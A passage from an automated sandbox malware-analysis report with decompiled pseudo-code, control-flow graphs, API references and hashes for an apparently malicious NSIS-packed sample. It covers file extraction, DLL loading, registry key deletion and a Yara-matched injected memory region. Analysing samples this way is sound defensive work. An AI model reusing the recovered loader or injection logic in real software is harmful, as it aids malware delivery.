                                                                                                                        									_v12 = _v12 - _t101;
                                                                                                                        									_v16 = _t77;
                                                                                                                        									L23:
                                                                                                                        									if(_v24 != 1) {
                                                                                                                        										continue;
                                                                                                                        									}
                                                                                                                        									goto L44;
                                                                                                                        								}
                                                                                                                        								_t78 = E004060DF(_a8, _v16, _t101); // executed
                                                                                                                        								if(_t78 == 0) {
                                                                                                                        									goto L28;
                                                                                                                        								}
                                                                                                                        								_v8 = _v8 + _t101;
                                                                                                                        								goto L23;
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        						_push(0xfffffffc);
                                                                                                                        						goto L42;
                                                                                                                        					}
                                                                                                                        					goto L41;
                                                                                                                        				}
                                                                                                                        			}



























                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CountTick$wsprintf
                                                                                                                        • String ID: *B$ ZB$ A$ A$... %d%%$}8@
                                                                                                                        • API String ID: 551687249-3683892814
                                                                                                                        • Opcode ID: 56b0f536eed8a80aa022ebbc190999bc8f902075b9028e03b58b2e81be541d07
                                                                                                                        • Instruction ID: 54ab186c05730647c672001b6e56d135182c7b51176e178f40f708a1e84a381e
                                                                                                                        • Opcode Fuzzy Hash: 56b0f536eed8a80aa022ebbc190999bc8f902075b9028e03b58b2e81be541d07
                                                                                                                        • Instruction Fuzzy Hash: E251BD31810219EBCF11DF65DA44B9E7BB8AF05756F10827BE804BB2C1D7789E44CBA9
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 627 40176f-401794 call 402da6 call 405e83 632 401796-40179c call 40653d 627->632 633 40179e-4017b0 call 40653d call 405e0c lstrcatW 627->633 638 4017b5-4017b6 call 4067c4 632->638 633->638 642 4017bb-4017bf 638->642 643 4017c1-4017cb call 406873 642->643 644 4017f2-4017f5 642->644 651 4017dd-4017ef 643->651 652 4017cd-4017db CompareFileTime 643->652 646 4017f7-4017f8 call 406008 644->646 647 4017fd-401819 call 40602d 644->647 646->647 654 40181b-40181e 647->654 655 40188d-4018b6 call 40559f call 4032b4 647->655 651->644 652->651 657 401820-40185e call 40653d * 2 call 40657a call 40653d call 405b9d 654->657 658 40186f-401879 call 40559f 654->658 668 4018b8-4018bc 655->668 669 4018be-4018ca SetFileTime 655->669 657->642 689 401864-401865 657->689 670 401882-401888 658->670 668->669 672 4018d0-4018db CloseHandle 668->672 669->672 673 402c33 670->673 675 4018e1-4018e4 672->675 676 402c2a-402c2d 672->676 677 402c35-402c39 673->677 679 4018e6-4018f7 call 40657a lstrcatW 675->679 680 4018f9-4018fc call 40657a 675->680 676->673 686 401901-402398 679->686 680->686 690 40239d-4023a2 686->690 691 402398 call 405b9d 686->691 689->670 692 401867-401868 689->692 690->677 691->690 692->658
                                                                                                                        C-Code - Quality: 75%
                                                                                                                        			E0040176F(FILETIME* __ebx, void* __eflags) {
                                                                                                                        				void* __esi;
                                                                                                                        				void* _t35;
                                                                                                                        				void* _t43;
                                                                                                                        				void* _t45;
                                                                                                                        				FILETIME* _t51;
                                                                                                                        				FILETIME* _t64;
                                                                                                                        				void* _t66;
                                                                                                                        				signed int _t72;
                                                                                                                        				FILETIME* _t73;
                                                                                                                        				FILETIME* _t77;
                                                                                                                        				signed int _t79;
                                                                                                                        				WCHAR* _t81;
                                                                                                                        				void* _t83;
                                                                                                                        				void* _t84;
                                                                                                                        				void* _t86;
                                                                                                                        
                                                                                                                        				_t77 = __ebx;
                                                                                                                        				 *(_t86 - 8) = E00402DA6(0x31);
                                                                                                                        				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
                                                                                                                        				_t35 = E00405E83( *(_t86 - 8));
                                                                                                                        				_push( *(_t86 - 8));
                                                                                                                        				_t81 = L"Call";
                                                                                                                        				if(_t35 == 0) {
                                                                                                                        					lstrcatW(E00405E0C(E0040653D(_t81, L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Folketingsvalget160\\Tatou\\Borgerdyderne\\BLATTARIAE\\Proprietrix\\Natick")), ??);
                                                                                                                        				} else {
                                                                                                                        					E0040653D();
                                                                                                                        				}
                                                                                                                        				E004067C4(_t81);
                                                                                                                        				while(1) {
                                                                                                                        					__eflags =  *(_t86 + 8) - 3;
                                                                                                                        					if( *(_t86 + 8) >= 3) {
                                                                                                                        						_t66 = E00406873(_t81);
                                                                                                                        						_t79 = 0;
                                                                                                                        						__eflags = _t66 - _t77;
                                                                                                                        						if(_t66 != _t77) {
                                                                                                                        							_t73 = _t66 + 0x14;
                                                                                                                        							__eflags = _t73;
                                                                                                                        							_t79 = CompareFileTime(_t73, _t86 - 0x24);
                                                                                                                        						}
                                                                                                                        						asm("sbb eax, eax");
                                                                                                                        						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
                                                                                                                        						__eflags = _t72;
                                                                                                                        						 *(_t86 + 8) = _t72;
                                                                                                                        					}
                                                                                                                        					__eflags =  *(_t86 + 8) - _t77;
                                                                                                                        					if( *(_t86 + 8) == _t77) {
                                                                                                                        						E00406008(_t81);
                                                                                                                        					}
                                                                                                                        					__eflags =  *(_t86 + 8) - 1;
                                                                                                                        					_t43 = E0040602D(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
                                                                                                                        					__eflags = _t43 - 0xffffffff;
                                                                                                                        					 *(_t86 - 0x38) = _t43;
                                                                                                                        					if(_t43 != 0xffffffff) {
                                                                                                                        						break;
                                                                                                                        					}
                                                                                                                        					__eflags =  *(_t86 + 8) - _t77;
                                                                                                                        					if( *(_t86 + 8) != _t77) {
                                                                                                                        						E0040559F(0xffffffe2,  *(_t86 - 8));
                                                                                                                        						__eflags =  *(_t86 + 8) - 2;
                                                                                                                        						if(__eflags == 0) {
                                                                                                                        							 *((intOrPtr*)(_t86 - 4)) = 1;
                                                                                                                        						}
                                                                                                                        						L31:
                                                                                                                        						 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t86 - 4));
                                                                                                                        						__eflags =  *0x434f88;
                                                                                                                        						goto L32;
                                                                                                                        					} else {
                                                                                                                        						E0040653D("C:\Users\Arthur\AppData\Local\Temp\nsiA9E6.tmp", _t83);
                                                                                                                        						E0040653D(_t83, _t81);
                                                                                                                        						E0040657A(_t77, _t81, _t83, "C:\Users\Arthur\AppData\Local\Temp\nsiA9E6.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x1c)));
                                                                                                                        						E0040653D(_t83, "C:\Users\Arthur\AppData\Local\Temp\nsiA9E6.tmp");
                                                                                                                        						_t64 = E00405B9D("C:\Users\Arthur\AppData\Local\Temp\nsiA9E6.tmp\System.dll",  *(_t86 - 0x30) >> 3) - 4;
                                                                                                                        						__eflags = _t64;
                                                                                                                        						if(_t64 == 0) {
                                                                                                                        							continue;
                                                                                                                        						} else {
                                                                                                                        							__eflags = _t64 == 1;
                                                                                                                        							if(_t64 == 1) {
                                                                                                                        								 *0x434f88 =  &( *0x434f88->dwLowDateTime);
                                                                                                                        								L32:
                                                                                                                        								_t51 = 0;
                                                                                                                        								__eflags = 0;
                                                                                                                        							} else {
                                                                                                                        								_push(_t81);
                                                                                                                        								_push(0xfffffffa);
                                                                                                                        								E0040559F();
                                                                                                                        								L29:
                                                                                                                        								_t51 = 0x7fffffff;
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        					L33:
                                                                                                                        					return _t51;
                                                                                                                        				}
                                                                                                                        				E0040559F(0xffffffea,  *(_t86 - 8)); // executed
                                                                                                                        				 *0x434fb4 =  *0x434fb4 + 1;
                                                                                                                        				_t45 = E004032B4( *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
                                                                                                                        				 *0x434fb4 =  *0x434fb4 - 1;
                                                                                                                        				__eflags =  *(_t86 - 0x24) - 0xffffffff;
                                                                                                                        				_t84 = _t45;
                                                                                                                        				if( *(_t86 - 0x24) != 0xffffffff) {
                                                                                                                        					L22:
                                                                                                                        					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
                                                                                                                        				} else {
                                                                                                                        					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
                                                                                                                        					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
                                                                                                                        						goto L22;
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        				CloseHandle( *(_t86 - 0x38)); // executed
                                                                                                                        				__eflags = _t84 - _t77;
                                                                                                                        				if(_t84 >= _t77) {
                                                                                                                        					goto L31;
                                                                                                                        				} else {
                                                                                                                        					__eflags = _t84 - 0xfffffffe;
                                                                                                                        					if(_t84 != 0xfffffffe) {
                                                                                                                        						E0040657A(_t77, _t81, _t84, _t81, 0xffffffee);
                                                                                                                        					} else {
                                                                                                                        						E0040657A(_t77, _t81, _t84, _t81, 0xffffffe9);
                                                                                                                        						lstrcatW(_t81,  *(_t86 - 8));
                                                                                                                        					}
                                                                                                                        					_push(0x200010);
                                                                                                                        					_push(_t81);
                                                                                                                        					E00405B9D();
                                                                                                                        					goto L29;
                                                                                                                        				}
                                                                                                                        				goto L33;
                                                                                                                        			}



















                                                                                                                        APIs
                                                                                                                        • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                                                                                        • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Folketingsvalget160\Tatou\Borgerdyderne\BLATTARIAE\Proprietrix\Natick,?,?,00000031), ref: 004017D5
                                                                                                                          • Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A
                                                                                                                          • Part of subcall function 0040559F: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll,00000000,00425A20,75AF23A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                                                                                          • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll,00000000,00425A20,75AF23A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                                                                                          • Part of subcall function 0040559F: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll,00403418), ref: 004055FA
                                                                                                                          • Part of subcall function 0040559F: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll), ref: 0040560C
                                                                                                                          • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                                                                                          • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                                                                                          • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp$C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Folketingsvalget160\Tatou\Borgerdyderne\BLATTARIAE\Proprietrix\Natick$Call
                                                                                                                        • API String ID: 1941528284-1848740903
                                                                                                                        • Opcode ID: 26adae0b9d6820c41748f31339b4d2b50d746b4e6cc2488d5fab55ec8ec1e035
                                                                                                                        • Instruction ID: 1e3f5e060805a06bac003644be00ba5f3fef1f2c353f2d3d357c0a6c5ca497fd
                                                                                                                        • Opcode Fuzzy Hash: 26adae0b9d6820c41748f31339b4d2b50d746b4e6cc2488d5fab55ec8ec1e035
                                                                                                                        • Instruction Fuzzy Hash: F4419371900108BACF11BFB5DD85DAE7A79EF45768B20423FF422B10E2D63C8A91966D
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 693 2ac0000-2ac04dd call 2ac002f call 2ac0345 709 2ac04e7-2ac04ee 693->709 709->709 710 2ac04f0-2ac05af 709->710 714 2ac05b5-2ac05e5 710->714 715 2ad30f0-2ad31cb 710->715 716 2ac1ab9-2ac1ac5 call 2ac180c 714->716 717 2ac05eb-2ac062a 714->717 721 2ad31cd-2ad31ff call 2ad3a08 call 2ad3220 715->721 722 2ad3201-2ad3210 LoadLibraryA call 2ad3220 715->722 727 2ac1ac6-2ac1adb 716->727 724 2ac062d-2ac0640 717->724 721->722 736 2ad701a-2ad7028 722->736 737 2ad3216-2ad321a 722->737 728 2ac0646-2ac0649 724->728 729 2acbc81-2acbd01 724->729 727->727 733 2ac1add-2ad329d 727->733 728->724 734 2ac064b-2ac0651 728->734 729->715 746 2ad32a2-2ad3356 call 2ad32e3 733->746 734->736 741 2ac0657-2ac0678 call 2ac067d 734->741 738 2ad7029-2ad705c 736->738 738->738 743 2ad705e-2ad7062 738->743 747 2ac0678 call 2ac067d 741->747 746->716 753 2ad335c-2ad33e6 call 2ad3487 call 2ad33b7 746->753 760 2ad33e8-2ad343a 753->760 761 2ad3452-2ad3482 753->761 760->716 763 2ad3440-2ad344a 760->763 763->746 764 2ad3450 763->764 764->761
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1104819346.0000000002AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2ac0000_SecuriteInfo.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 0;$:$C$Q$e$y${
                                                                                                                        • API String ID: 0-2646086558
                                                                                                                        • Opcode ID: a195932124b4c81591e77f8286a10bb356897dcc2b2f8c3f3fd53da4be1b23c8
                                                                                                                        • Instruction ID: 0e2ce8c2a3c7ec9321bdd677fdecc93387d56d5f23f65651d63e3db7ef7cd63a
                                                                                                                        • Opcode Fuzzy Hash: a195932124b4c81591e77f8286a10bb356897dcc2b2f8c3f3fd53da4be1b23c8
                                                                                                                        • Instruction Fuzzy Hash: E781797474870ADFEF345E789AE13EB77679F16390FA4416ECC4A87146DF228489CA02
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 765 40559f-4055b4 766 4055ba-4055cb 765->766 767 40566b-40566f 765->767 768 4055d6-4055e2 lstrlenW 766->768 769 4055cd-4055d1 call 40657a 766->769 771 4055e4-4055f4 lstrlenW 768->771 772 4055ff-405603 768->772 769->768 771->767 775 4055f6-4055fa lstrcatW 771->775 773 405612-405616 772->773 774 405605-40560c SetWindowTextW 772->774 776 405618-40565a SendMessageW * 3 773->776 777 40565c-40565e 773->777 774->773 775->772 776->777 777->767 778 405660-405663 777->778 778->767
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E0040559F(signed int _a4, WCHAR* _a8) {
                                                                                                                        				struct HWND__* _v8;
                                                                                                                        				signed int _v12;
                                                                                                                        				WCHAR* _v32;
                                                                                                                        				long _v44;
                                                                                                                        				int _v48;
                                                                                                                        				void* _v52;
                                                                                                                        				void* __ebx;
                                                                                                                        				void* __edi;
                                                                                                                        				void* __esi;
                                                                                                                        				WCHAR* _t27;
                                                                                                                        				signed int _t28;
                                                                                                                        				long _t29;
                                                                                                                        				signed int _t37;
                                                                                                                        				signed int _t38;
                                                                                                                        
                                                                                                                        				_t27 =  *0x433ee4; // 0x1041e
                                                                                                                        				_v8 = _t27;
                                                                                                                        				if(_t27 != 0) {
                                                                                                                        					_t37 =  *0x434fb4;
                                                                                                                        					_v12 = _t37;
                                                                                                                        					_t38 = _t37 & 0x00000001;
                                                                                                                        					if(_t38 == 0) {
                                                                                                                        						E0040657A(_t38, 0, 0x42c248, 0x42c248, _a4);
                                                                                                                        					}
                                                                                                                        					_t27 = lstrlenW(0x42c248);
                                                                                                                        					_a4 = _t27;
                                                                                                                        					if(_a8 == 0) {
                                                                                                                        						L6:
                                                                                                                        						if((_v12 & 0x00000004) == 0) {
                                                                                                                        							_t27 = SetWindowTextW( *0x433ec8, 0x42c248); // executed
                                                                                                                        						}
                                                                                                                        						if((_v12 & 0x00000002) == 0) {
                                                                                                                        							_v32 = 0x42c248;
                                                                                                                        							_v52 = 1;
                                                                                                                        							_t29 = SendMessageW(_v8, 0x1004, 0, 0); // executed
                                                                                                                        							_v44 = 0;
                                                                                                                        							_v48 = _t29 - _t38;
                                                                                                                        							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52); // executed
                                                                                                                        							_t27 = SendMessageW(_v8, 0x1013, _v48, 0); // executed
                                                                                                                        						}
                                                                                                                        						if(_t38 != 0) {
                                                                                                                        							_t28 = _a4;
                                                                                                                        							0x42c248[_t28] = 0;
                                                                                                                        							return _t28;
                                                                                                                        						}
                                                                                                                        					} else {
                                                                                                                        						_t27 = lstrlenW(_a8) + _a4;
                                                                                                                        						if(_t27 < 0x1000) {
                                                                                                                        							_t27 = lstrcatW(0x42c248, _a8);
                                                                                                                        							goto L6;
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        				return _t27;
                                                                                                                        			}


















                                                                                                                        APIs
                                                                                                                        • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll,00000000,00425A20,75AF23A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                                                                                        • lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll,00000000,00425A20,75AF23A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                                                                                        • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll,00403418), ref: 004055FA
                                                                                                                        • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll), ref: 0040560C
                                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                                                                                        • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                                                                                          • Part of subcall function 0040657A: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                                                                                                          • Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll,00000000), ref: 00406779
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                                                                                                        • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll
                                                                                                                        • API String ID: 1495540970-4211874846
                                                                                                                        • Opcode ID: 195069dcc2a5024ac29c7a45bf60c8768b6efe327543dfefb6c4dd5180e0e504
                                                                                                                        • Instruction ID: 138a2a903332092674924c4fce2a37a83712bc812e9b86ab44911e1df8857bb6
                                                                                                                        • Opcode Fuzzy Hash: 195069dcc2a5024ac29c7a45bf60c8768b6efe327543dfefb6c4dd5180e0e504
                                                                                                                        • Instruction Fuzzy Hash: C1219071900558BACF11AFA9DD84DDFBF75EF45354F14803AF904B22A0C7794A419F68
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 779 40689a-4068ba GetSystemDirectoryW 780 4068bc 779->780 781 4068be-4068c0 779->781 780->781 782 4068d1-4068d3 781->782 783 4068c2-4068cb 781->783 784 4068d4-406907 wsprintfW LoadLibraryExW 782->784 783->782 785 4068cd-4068cf 783->785 785->784
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E0040689A(intOrPtr _a4) {
                                                                                                                        				short _v576;
                                                                                                                        				signed int _t13;
                                                                                                                        				struct HINSTANCE__* _t17;
                                                                                                                        				signed int _t19;
                                                                                                                        				void* _t24;
                                                                                                                        
                                                                                                                        				_t13 = GetSystemDirectoryW( &_v576, 0x104);
                                                                                                                        				if(_t13 > 0x104) {
                                                                                                                        					_t13 = 0;
                                                                                                                        				}
                                                                                                                        				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
                                                                                                                        					_t19 = 1;
                                                                                                                        				} else {
                                                                                                                        					_t19 = 0;
                                                                                                                        				}
                                                                                                                        				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
                                                                                                                        				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
                                                                                                                        				return _t17;
                                                                                                                        			}









                                                                                                                        APIs
                                                                                                                        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
                                                                                                                        • wsprintfW.USER32 ref: 004068EC
                                                                                                                        • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                        • String ID: %s%S.dll$UXTHEME$\
                                                                                                                        • API String ID: 2200240437-1946221925
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph

                                                                                                                        control_flow_graph 786 405a6e-405ab9 CreateDirectoryW 787 405abb-405abd 786->787 788 405abf-405acc GetLastError 786->788 789 405ae6-405ae8 787->789 788->789 790 405ace-405ae2 SetFileSecurityW 788->790 790->787 791 405ae4 GetLastError 790->791 791->789
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E00405A6E(WCHAR* _a4) {
                                                                                                                        				struct _SECURITY_ATTRIBUTES _v16;
                                                                                                                        				struct _SECURITY_DESCRIPTOR _v36;
                                                                                                                        				int _t22;
                                                                                                                        				long _t23;
                                                                                                                        
                                                                                                                        				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                                                                                                                        				_v36.Owner = 0x4083f8;
                                                                                                                        				_v36.Group = 0x4083f8;
                                                                                                                        				_v36.Sacl = _v36.Sacl & 0x00000000;
                                                                                                                        				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                                                                                                                        				_v16.lpSecurityDescriptor =  &_v36;
                                                                                                                        				_v36.Revision = 1;
                                                                                                                        				_v36.Control = 4;
                                                                                                                        				_v36.Dacl = 0x4083e8;
                                                                                                                        				_v16.nLength = 0xc;
                                                                                                                        				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
                                                                                                                        				if(_t22 != 0) {
                                                                                                                        					L1:
                                                                                                                        					return 0;
                                                                                                                        				}
                                                                                                                        				_t23 = GetLastError();
                                                                                                                        				if(_t23 == 0xb7) {
                                                                                                                        					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
                                                                                                                        						goto L1;
                                                                                                                        					}
                                                                                                                        					return GetLastError();
                                                                                                                        				}
                                                                                                                        				return _t23;
                                                                                                                        			}








                                                                                                                        APIs
                                                                                                                        • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
                                                                                                                        • GetLastError.KERNEL32 ref: 00405AC5
                                                                                                                        • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405ADA
                                                                                                                        • GetLastError.KERNEL32 ref: 00405AE4
                                                                                                                        Strings
                                                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A94
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                        • API String ID: 3449924974-3355392842
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph

                                                                                                                        control_flow_graph 971 402ea9-402ed2 call 4063aa 973 402ed7-402edb 971->973 974 402ee1-402ee5 973->974 975 402f8c-402f90 973->975 976 402ee7-402f08 RegEnumValueW 974->976 977 402f0a-402f1d 974->977 976->977 978 402f71-402f7f RegCloseKey 976->978 979 402f46-402f4d RegEnumKeyW 977->979 978->975 980 402f1f-402f21 979->980 981 402f4f-402f61 RegCloseKey call 40690a 979->981 980->978 982 402f23-402f37 call 402ea9 980->982 987 402f81-402f87 981->987 988 402f63-402f6f RegDeleteKeyW 981->988 982->981 989 402f39-402f45 982->989 987->975 988->975 989->979
                                                                                                                        C-Code - Quality: 48%
                                                                                                                        			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
                                                                                                                        				void* _v8;
                                                                                                                        				int _v12;
                                                                                                                        				short _v536;
                                                                                                                        				void* _t27;
                                                                                                                        				signed int _t33;
                                                                                                                        				intOrPtr* _t35;
                                                                                                                        				signed int _t45;
                                                                                                                        				signed int _t46;
                                                                                                                        				signed int _t47;
                                                                                                                        
                                                                                                                        				_t46 = _a12;
                                                                                                                        				_t47 = _t46 & 0x00000300;
                                                                                                                        				_t45 = _t46 & 0x00000001;
                                                                                                                        				_t27 = E004063AA(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8); // executed
                                                                                                                        				if(_t27 == 0) {
                                                                                                                        					if((_a12 & 0x00000002) == 0) {
                                                                                                                        						L3:
                                                                                                                        						_push(0x105);
                                                                                                                        						_push( &_v536);
                                                                                                                        						_push(0);
                                                                                                                        						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
                                                                                                                        							__eflags = _t45;
                                                                                                                        							if(__eflags != 0) {
                                                                                                                        								L10:
